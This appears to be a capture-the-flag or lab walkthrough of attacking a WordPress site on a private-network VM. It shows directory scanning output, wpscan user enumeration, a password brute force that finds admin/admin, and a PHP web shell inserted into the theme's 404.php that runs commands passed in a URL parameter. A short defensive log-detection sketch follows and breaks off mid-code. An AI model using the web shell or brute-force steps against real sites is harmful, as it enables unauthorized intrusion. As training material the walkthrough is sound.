+ http://192.168.0.122/upload/admins/media/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/media/thumb (CODE:200|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/modules/ ----
+ http://192.168.0.122/upload/admins/modules/details (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/modules/index (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/modules/index.php (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/modules/install (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/modules/uninstall (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/pages/ ----
+ http://192.168.0.122/upload/admins/pages/add (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/admins/pages/delete (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/pages/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/pages/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/pages/modify (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/pages/restore (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/pages/save (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/admins/pages/sections (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/admins/pages/settings (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/pages/trash (CODE:302|SIZE:0)                                                                                                                                                                
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.0.122/upload/admins/preferences/ ----
+ http://192.168.0.122/upload/admins/preferences/index (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/preferences/index.php (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/upload/admins/preferences/save (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/profiles/ ----
+ http://192.168.0.122/upload/admins/profiles/index (CODE:200|SIZE:324)                                                                                                                                                          
+ http://192.168.0.122/upload/admins/profiles/index.php (CODE:200|SIZE:324)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/service/ ----
+ http://192.168.0.122/upload/admins/service/index (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/service/index.php (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/settings/ ----
+ http://192.168.0.122/upload/admins/settings/index (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/admins/settings/index.php (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/admins/settings/save (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/settings/setting (CODE:200|SIZE:3839)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/start/ ----
+ http://192.168.0.122/upload/admins/start/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/start/index.php (CODE:302|SIZE:0)                                                                                                                                                           
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/support/ ----
+ http://192.168.0.122/upload/admins/support/index (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/support/index.php (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/templates/ ----
+ http://192.168.0.122/upload/admins/templates/details (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/templates/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/upload/admins/templates/install (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/templates/uninstall (CODE:302|SIZE:0)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/users/ ----
+ http://192.168.0.122/upload/admins/users/add (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/admins/users/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/users/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/users/save (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/admins/users/users (CODE:302|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/framework/functions/ ----
+ http://192.168.0.122/upload/framework/functions/index (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/framework/functions/index.php (CODE:302|SIZE:0)                                                                                                                                                    
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/yui/ ----
==> DIRECTORY: http://192.168.0.122/upload/include/yui/event/                                                                                                                                                                    
+ http://192.168.0.122/upload/include/yui/index (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/include/yui/index.php (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/include/yui/README (CODE:200|SIZE:8488)                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/include/yui/yahoo/                                                                                                                                                                    
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/ ----
+ http://192.168.0.122/upload/modules/news/add (CODE:403|SIZE:82)                                                                                                                                                                
+ http://192.168.0.122/upload/modules/news/comment (CODE:302|SIZE:0)                                                                                                                                                             
==> DIRECTORY: http://192.168.0.122/upload/modules/news/css/                                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/delete (CODE:403|SIZE:85)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/icon (CODE:200|SIZE:1058)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/modules/news/info (CODE:403|SIZE:83)                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/info.php (CODE:403|SIZE:83)                                                                                                                                                           
+ http://192.168.0.122/upload/modules/news/install (CODE:403|SIZE:86)                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/modules/news/languages/                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/modify (CODE:403|SIZE:85)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/rss (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/modules/news/search (CODE:403|SIZE:85)                                                                                                                                                             
==> DIRECTORY: http://192.168.0.122/upload/modules/news/templates/                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/uninstall (CODE:403|SIZE:88)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/news/upgrade (CODE:403|SIZE:86)                                                                                                                                                            
+ http://192.168.0.122/upload/modules/news/view (CODE:403|SIZE:83)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/ ----
+ http://192.168.0.122/upload/modules/wysiwyg/add (CODE:403|SIZE:85)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/wysiwyg/delete (CODE:403|SIZE:88)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/wysiwyg/icon (CODE:200|SIZE:1058)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/wysiwyg/index (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/index.php (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/modules/wysiwyg/info (CODE:403|SIZE:86)                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/info.php (CODE:403|SIZE:86)                                                                                                                                                        
+ http://192.168.0.122/upload/modules/wysiwyg/install (CODE:403|SIZE:89)                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/languages/                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/modify (CODE:403|SIZE:88)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/wysiwyg/save (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/wysiwyg/search (CODE:403|SIZE:88)                                                                                                                                                          
==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/templates/                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/upgrade (CODE:403|SIZE:89)                                                                                                                                                         
+ http://192.168.0.122/upload/modules/wysiwyg/view (CODE:403|SIZE:86)                                                                                                                                                            
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/page/posts/ ----
+ http://192.168.0.122/upload/page/posts/index (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/page/posts/index.php (CODE:302|SIZE:0)                                                                                                                                                             
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/temp/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/templates/blank/ ----
+ http://192.168.0.122/upload/templates/blank/index (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/templates/blank/index.php (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/templates/blank/info (CODE:403|SIZE:86)                                                                                                                                                            
+ http://192.168.0.122/upload/templates/blank/info.php (CODE:403|SIZE:86)                                                                                                                                                        
+ http://192.168.0.122/upload/templates/blank/preview (CODE:200|SIZE:1377)                                                                                                                                                       
+ http://192.168.0.122/upload/templates/blank/template (CODE:200|SIZE:507)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/network/ ----
+ http://192.168.0.122/wordpress/wp-admin/network/about (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/admin (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-admin/network/credits (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/edit (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/wordpress/wp-admin/network/index (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-admin/network/menu (CODE:500|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/wordpress/wp-admin/network/plugins (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/profile (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/settings (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/wordpress/wp-admin/network/setup (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/sites (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/themes (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/network/update (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/network/upgrade (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/users (CODE:302|SIZE:0)                                                                                                                                                        
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/user/ ----
+ http://192.168.0.122/wordpress/wp-admin/user/about (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/user/admin (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/user/credits (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/wordpress/wp-admin/user/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/user/menu (CODE:500|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/user/profile (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/plugins/ ----
+ http://192.168.0.122/wordpress/wp-content/plugins/hello (CODE:500|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-content/plugins/index (CODE:200|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                                                                  
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/themes/ ----
+ http://192.168.0.122/wordpress/wp-content/themes/index (CODE:200|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                                                                   
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/login/forgot/ ----
+ http://192.168.0.122/upload/admins/login/forgot/index (CODE:200|SIZE:2531)                                                                                                                                                     
+ http://192.168.0.122/upload/admins/login/forgot/index.php (CODE:200|SIZE:2531)                                                                                                                                                 
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/yui/event/ ----
+ http://192.168.0.122/upload/include/yui/event/event (CODE:200|SIZE:87537)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/event/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/include/yui/event/index.php (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/event/README (CODE:200|SIZE:9807)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/yui/yahoo/ ----
+ http://192.168.0.122/upload/include/yui/yahoo/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/include/yui/yahoo/index.php (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/yahoo/README (CODE:200|SIZE:2889)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/yahoo/yahoo (CODE:200|SIZE:35223)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/css/ ----
+ http://192.168.0.122/upload/modules/news/css/backend (CODE:200|SIZE:1416)                                                                                                                                                      
+ http://192.168.0.122/upload/modules/news/css/frontend (CODE:200|SIZE:1771)                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/css/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/modules/news/css/index.php (CODE:302|SIZE:0)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/languages/ ----
+ http://192.168.0.122/upload/modules/news/languages/index (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/languages/index.php (CODE:302|SIZE:0)                                                                                                                                                 
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/templates/ ----
==> DIRECTORY: http://192.168.0.122/upload/modules/news/templates/backend/                                                                                                                                                       
+ http://192.168.0.122/upload/modules/news/templates/index (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                 
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/languages/ ----
+ http://192.168.0.122/upload/modules/wysiwyg/languages/index (CODE:302|SIZE:0)                                                                                                                                                  
+ http://192.168.0.122/upload/modules/wysiwyg/languages/index.php (CODE:302|SIZE:0)                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/templates/ ----
+ http://192.168.0.122/upload/modules/wysiwyg/templates/index (CODE:302|SIZE:0)                                                                                                                                                  
+ http://192.168.0.122/upload/modules/wysiwyg/templates/index.php (CODE:302|SIZE:0)                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/templates/backend/ ----
+ http://192.168.0.122/upload/modules/news/templates/backend/index (CODE:302|SIZE:0)                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/templates/backend/index.php (CODE:302|SIZE:0)                                                                                                                                         
                                                                                                                                                                                                                                 
-----------------
END_TIME: Mon Jan 23 21:35:16 2023
DOWNLOADED: 258272 - FOUND: 252


Here we can see three important files/folders:

/upload
/wordpress
/robots.txt

Access robots.txt at the URL

http://192.168.0.122/robots.txt

which returns:

Disallow: Hackers
Allow: /wordpress/
   ____                              
#  /___ \_   _  __ _  ___   __ _ _ __ 
# //  / / | | |/ _` |/ _ \ / _` | '__|
#/ \_/ /| |_| | (_| | (_) | (_| | |   
#\___,_\ \__,_|\__,_|\___/ \__,_|_|   
                                    

Access /upload

http://192.168.0.122/upload/

There is a LEPTON CMS, but it is hard to access because it uses the IP 192.168.0.190.

WordPress Scanning

Scan WordPress:

wpscan --url http://192.168.0.122/wordpress --enumerate u

The result:

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|  

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.122/wordpress/ [192.168.0.122]
[+] Started: Mon Jan 23 21:45:40 2023  

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.2.22 (Ubuntu)
 |  - X-Powered-By: PHP/5.3.10-1ubuntu3
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.122/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ 

[+] WordPress readme found: http://192.168.0.122/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.122/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.122/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299 

[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.0.122/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
 |  - http://192.168.0.122/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>  

[+] WordPress theme in use: twentyfourteen
 | Location: http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | [!] The version is out of date, the latest version is 3.5
 | Style URL: http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
 | Style Name: Twenty Fourteen
 | Style URI: http://wordpress.org/themes/twentyfourteen
 | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
 | Author: the WordPress team
 | Author URI: http://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14, Match: 'Version: 1.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 
<====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wpuser
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register 

[+] Finished: Mon Jan 23 21:45:46 2023
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 15.813 KB
[+] Data Received: 231.31 KB
[+] Memory used: 186.273 MB
[+] Elapsed time: 00:00:05

WordPress Bruteforce password

Try a brute force:

wpscan --url http://192.168.0.122/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames admin -t 50

After a while, the result:

.........
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - admin / admin                                                                                                                                                                                                         
All Found                                                                                                                                                                                                                         
Progress Time: 00:01:41 <                                                                                                                                                                     
> (40 / 28688)  0.13%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: admin

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 23 21:55:08 2023
[+] Requests Done: 185
[+] Cached Requests: 39
[+] Data Sent: 52.958 KB
[+] Data Received: 4.135 MB
[+] Memory used: 338.531 MB
[+] Elapsed time: 00:01:58
                             

It appears the credentials are

username admin
password admin

Inject cmd vulnerability

Try logging in at

http://192.168.0.122/wordpress/wp-login.php

Go to

Appearance > Editor > 404 Template (404.php)

Insert

<?php
/**
 * The template for displaying 404 pages (Not Found)
 *
 * @package WordPress
 * @subpackage Twenty_Fourteen
 * @since Twenty Fourteen 1.0
 */

echo "

";
 echo shell_exec($_GET['cmd']);
 echo "

";

exit();

get_header(); ?>

Don't forget to save after adding it. Perform command injection through the URL:

http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd;%20ls%20-lah;%20id

If it succeeds, the output is:

/var/www/wordpress/wp-content/themes/twentyfourteen
total 864K
drwxr-xr-x 9 www-data www-data 4.0K Oct 12  2016 .
drwxr-xr-x 5 www-data www-data 4.0K Oct 16  2016 ..
-rw-r--r-- 1 www-data www-data  823 Jan 23 22:30 404.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 archive.php
-rw-r--r-- 1 www-data www-data 1.9K Oct 12  2016 author.php
-rw-r--r-- 1 www-data www-data 1.5K Oct 12  2016 category.php
-rw-r--r-- 1 www-data www-data 2.3K Oct 12  2016 comments.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-aside.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-audio.php
-rw-r--r-- 1 www-data www-data 1.1K Oct 12  2016 content-featured-post.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-gallery.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-image.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-link.php
-rw-r--r-- 1 www-data www-data  961 Oct 12  2016 content-none.php
-rw-r--r-- 1 www-data www-data  871 Oct 12  2016 content-page.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-quote.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-video.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 css
-rw-r--r-- 1 www-data www-data  946 Oct 12  2016 featured-content.php
-rw-r--r-- 1 www-data www-data  728 Oct 12  2016 footer.php
-rw-r--r-- 1 www-data www-data  16K Oct 12  2016 functions.php
drwxr-xr-x 3 www-data www-data 4.0K Oct 12  2016 genericons
-rw-r--r-- 1 www-data www-data 2.3K Oct 12  2016 header.php
-rw-r--r-- 1 www-data www-data 2.6K Oct 12  2016 image.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 images
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 inc
-rw-r--r-- 1 www-data www-data 1.6K Oct 12  2016 index.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 js
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 languages
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 page-templates
-rw-r--r-- 1 www-data www-data 1.2K Oct 12  2016 page.php
-rw-r--r-- 1 www-data www-data  16K Oct 12  2016 rtl.css
-rw-r--r-- 1 www-data www-data 603K Oct 12  2016 screenshot.png
-rw-r--r-- 1 www-data www-data 1.3K Oct 12  2016 search.php
-rw-r--r-- 1 www-data www-data  340 Oct 12  2016 sidebar-content.php
-rw-r--r-- 1 www-data www-data  395 Oct 12  2016 sidebar-footer.php
-rw-r--r-- 1 www-data www-data  848 Oct 12  2016 sidebar.php
-rw-r--r-- 1 www-data www-data 1.1K Oct 12  2016 single.php
-rw-r--r-- 1 www-data www-data  74K Oct 12  2016 style.css
-rw-r--r-- 1 www-data www-data 1.6K Oct 12  2016 tag.php
-rw-r--r-- 1 www-data www-data 2.4K Oct 12  2016 taxonomy-post_format.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
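
From the defender's side, the XML-RPC password attack and the direct requests to 404.php shown above both leave a recognizable trail in the Apache access log. The following Python detection sketch is an added example, not part of the original walkthrough; the log lines, client IPs, rule names and threshold are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote_plus

# Constructed sample in Apache combined log format (not captured from the VM).
SAMPLE_LOG = """\
192.168.0.50 - - [23/Jan/2023:21:50:01 +0700] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 4312 "-" "-"
192.168.0.50 - - [23/Jan/2023:21:50:02 +0700] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 4312 "-" "-"
192.168.0.50 - - [23/Jan/2023:21:50:03 +0700] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 4312 "-" "-"
192.168.0.77 - - [23/Jan/2023:22:01:10 +0700] "GET /wordpress/?p=1 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
192.168.0.50 - - [23/Jan/2023:22:30:55 +0700] "GET /wordpress/wp-content/themes/twentyfourteen/404.php HTTP/1.1" 200 20 "-" "Mozilla/5.0"
192.168.0.50 - - [23/Jan/2023:22:31:07 +0700] "GET /wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd;%20ls%20-lah;%20id HTTP/1.1" 200 3350 "-" "Mozilla/5.0"
192.168.0.77 - - [23/Jan/2023:22:33:40 +0700] "GET /wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14 HTTP/1.1" 200 75000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# WordPress serves pages through index.php, so a PHP file under themes/ or
# uploads/ that is requested directly deserves a look.
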